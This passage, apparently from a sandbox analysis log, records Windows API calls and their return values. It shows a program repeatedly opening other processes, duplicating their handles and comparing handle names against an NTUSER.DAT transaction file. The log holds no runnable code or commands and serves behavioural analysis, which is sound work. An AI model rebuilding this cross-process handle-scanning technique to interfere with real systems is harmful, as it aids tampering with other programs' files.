lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.006] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.007] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.007] CloseHandle (hObject=0x670) returned 1 [0155.007] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.007] CloseHandle (hObject=0x680) returned 1 [0155.007] CloseHandle (hObject=0x62c) returned 1 [0155.007] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0155.007] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.008] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.010] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.010] CloseHandle (hObject=0x670) returned 1 [0155.010] CloseHandle (hObject=0x680) returned 1 [0155.010] CloseHandle (hObject=0x62c) returned 1 [0155.010] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0155.010] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.011] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.011] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.012] CloseHandle (hObject=0x670) returned 1 [0155.012] CloseHandle (hObject=0x680) returned 1 [0155.012] CloseHandle (hObject=0x62c) returned 1 [0155.012] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0155.012] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.012] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.013] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.013] CloseHandle (hObject=0x670) returned 1 [0155.013] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0155.013] CloseHandle (hObject=0x680) returned 1 [0155.013] CloseHandle (hObject=0x62c) returned 1 [0155.013] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0155.013] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.019] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.020] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.020] CloseHandle (hObject=0x670) returned 1 [0155.020] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.020] CloseHandle (hObject=0x680) returned 1 [0155.020] CloseHandle (hObject=0x62c) returned 1 [0155.020] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0155.020] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.021] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.021] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.021] CloseHandle (hObject=0x670) returned 1 [0155.021] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.021] CloseHandle (hObject=0x680) returned 1 [0155.022] CloseHandle (hObject=0x62c) returned 1 [0155.022] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0155.022] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.022] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.023] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.023] CloseHandle (hObject=0x670) returned 1 [0155.023] CloseHandle (hObject=0x680) returned 1 [0155.023] CloseHandle (hObject=0x62c) returned 1 [0155.023] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0155.023] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.024] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.025] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.025] CloseHandle (hObject=0x670) returned 1 [0155.025] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.025] CloseHandle (hObject=0x680) returned 1 [0155.025] CloseHandle (hObject=0x62c) returned 1 [0155.025] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0155.025] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.025] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.026] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.026] CloseHandle (hObject=0x670) returned 1 [0155.026] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.026] CloseHandle (hObject=0x680) returned 1 [0155.026] CloseHandle (hObject=0x62c) returned 1 [0155.026] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0155.026] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.027] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.028] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.028] CloseHandle (hObject=0x670) returned 1 [0155.028] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.028] CloseHandle (hObject=0x680) returned 1 [0155.028] CloseHandle (hObject=0x62c) returned 1 [0155.028] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0155.028] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.029] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.029] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.030] CloseHandle (hObject=0x670) returned 1 [0155.030] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0155.030] CloseHandle (hObject=0x680) returned 1 [0155.030] CloseHandle (hObject=0x62c) returned 1 [0155.030] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0155.030] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.031] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.031] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.031] CloseHandle (hObject=0x670) returned 1 [0155.031] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.031] CloseHandle (hObject=0x680) returned 1 [0155.032] CloseHandle (hObject=0x62c) returned 1 [0155.032] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0155.032] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.033] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.033] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.034] CloseHandle (hObject=0x670) returned 1 [0155.034] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0155.034] CloseHandle (hObject=0x680) returned 1 [0155.034] CloseHandle (hObject=0x62c) returned 1 [0155.034] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0155.034] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.034] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.035] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.035] CloseHandle (hObject=0x670) returned 1 [0155.035] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.035] CloseHandle (hObject=0x680) returned 1 [0155.035] CloseHandle (hObject=0x62c) returned 1 [0155.035] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0155.035] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.035] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.036] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.036] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.036] CloseHandle (hObject=0x670) returned 1 [0155.037] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.037] CloseHandle (hObject=0x680) returned 1 [0155.037] CloseHandle (hObject=0x62c) returned 1 [0155.037] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0155.037] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.037] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.038] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.038] CloseHandle (hObject=0x670) returned 1 [0155.038] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.038] CloseHandle (hObject=0x680) returned 1 [0155.038] CloseHandle (hObject=0x62c) returned 1 [0155.038] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x62c [0155.038] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.039] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.040] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.040] CloseHandle (hObject=0x670) returned 1 [0155.040] _wcsicmp (_Str1="\\Google", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -7 [0155.040] CloseHandle (hObject=0x680) returned 1 [0155.040] CloseHandle (hObject=0x62c) returned 1 [0155.040] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0155.040] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.041] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.041] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.041] CloseHandle (hObject=0x670) returned 1 [0155.041] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.042] CloseHandle (hObject=0x680) returned 1 [0155.042] CloseHandle (hObject=0x62c) returned 1 [0155.042] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x62c [0155.042] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.042] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.043] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.043] CloseHandle (hObject=0x670) returned 1 [0155.043] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.043] CloseHandle (hObject=0x680) returned 1 [0155.043] CloseHandle (hObject=0x62c) returned 1 [0155.043] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0155.043] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.044] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.045] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.045] CloseHandle (hObject=0x670) returned 1 [0155.045] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.045] CloseHandle (hObject=0x680) returned 1 [0155.045] CloseHandle (hObject=0x62c) returned 1 [0155.045] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x62c [0155.045] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.046] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.046] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.046] CloseHandle (hObject=0x670) returned 1 [0155.046] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.046] CloseHandle (hObject=0x680) returned 1 [0155.046] CloseHandle (hObject=0x62c) returned 1 [0155.046] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0155.046] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.047] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.048] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.048] CloseHandle (hObject=0x670) returned 1 [0155.048] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.048] CloseHandle (hObject=0x680) returned 1 [0155.048] CloseHandle (hObject=0x62c) returned 1 [0155.048] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0155.048] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.049] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.050] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.050] CloseHandle (hObject=0x670) returned 1 [0155.050] _wcsicmp (_Str1="\\Java", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -4 [0155.050] CloseHandle (hObject=0x680) returned 1 [0155.050] CloseHandle (hObject=0x62c) returned 1 [0155.050] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0155.050] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.050] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.051] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.053] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.053] CloseHandle (hObject=0x670) returned 1 [0155.053] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.053] CloseHandle (hObject=0x680) returned 1 [0155.053] CloseHandle (hObject=0x62c) returned 1 [0155.053] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0155.053] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.054] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.054] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.054] CloseHandle (hObject=0x670) returned 1 [0155.055] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.055] CloseHandle (hObject=0x680) returned 1 [0155.055] CloseHandle (hObject=0x62c) returned 1 [0155.055] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0155.055] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.055] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.056] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.056] CloseHandle (hObject=0x670) returned 1 [0155.056] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.056] CloseHandle (hObject=0x680) returned 1 